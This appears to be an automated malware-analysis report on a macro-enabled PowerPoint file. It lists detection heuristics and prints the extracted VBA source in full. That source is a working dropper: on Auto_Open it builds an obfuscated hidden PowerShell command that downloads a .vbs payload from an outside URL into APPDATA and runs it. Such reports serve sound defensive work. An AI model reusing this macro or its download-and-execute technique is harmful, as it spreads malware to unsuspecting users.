MALICIOUS
270
Risk Score
Heuristics 8
-
VBA project inside OOXML medium 6 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
objqcydwyqnozj.CreateObject("WScript.Shell").Run eaoasunlkm, 0 -
Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URLVBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.Matched line in script
objqcydwyqnozj.CreateObject("WScript.Shell").Run eaoasunlkm, 0 -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
objqcydwyqnozj.CreateObject("WScript.Shell").Run eaoasunlkm, 0 -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set objqcydwyqnozj = GetObject("new:" & OUTLOOK) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub Auto_Open() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://c.top4top.io/p_1832dqk101.jpg Referenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1388 bytes |
SHA-256: 160e5c721a362f85c5108f874cf32eba29f077d4286061a49bf7b6285d3cfc0f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Módulo1"
Sub Auto_Open()
rQQhFuWy
End Sub
'------------------------------
Public Sub rQQhFuWy()
On Error Resume Next
Dim lll As String
lll = "c"
'a = Left("EHjsjIDMxu LhMLhJOHi YHHhhfBpzt", 1)
b = Left("PHjsjIDMxu LhMLhJOHi YHHhhfBpzt", 1)
'Right function
c = Left("OHjsjIDMxu LhMLhJOHi YHHhhfBpzt", 1)
'Mid function
q = Mid("EHjsjIDMxu LhMLhJOHi YHHhhfBpzt", 1, 11)
'Split function
d = Split("EHjsjIDMxu LhMLhJOHi YHHhhfBpzt", " ")
For Each wrd In d
strg = strg & wrd & ", "
Next
a = "#|Pandorinha|#-windowstyle#|Pandorinha|#hidden#|Pandorinha|#$r='KEX'.replace('K','I');#|Pandorinha|#sal#|Pandorinha|#D#|Pandorinha|#$r;'(&(GCM'+'#|Pandorinha|#*W-O*)'+#|Pandorinha|#'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''https://c.top4top.io/p_1832dqk101.jpg'',$env:APPDATA+''\\''+''recom.vbs'')'|D;#|Pandorinha|#start-process($env:APPDATA+'\\'+'recom.vbs')"
a = Replace(a, "#|Pandorinha|#", " ")
bolota = b & c & "wershell" & a
If LYSC = 0 Then
641:
qcydwyqnozj (bolota)
Else
End If
End Sub
Sub qcydwyqnozj(eaoasunlkm As String)
Const OUTLOOK = _
"{0006F03A-0000-0000-C000-000000000046}"
Set objqcydwyqnozj = GetObject("new:" & OUTLOOK)
objqcydwyqnozj.CreateObject("WScript.Shell").Run eaoasunlkm, 0
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: ppt/vbaProject.bin | 18432 bytes |
SHA-256: 306733a5dab45139c433bc8e7b30328607d40542b9b1117d7e60591f49a78e6b |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.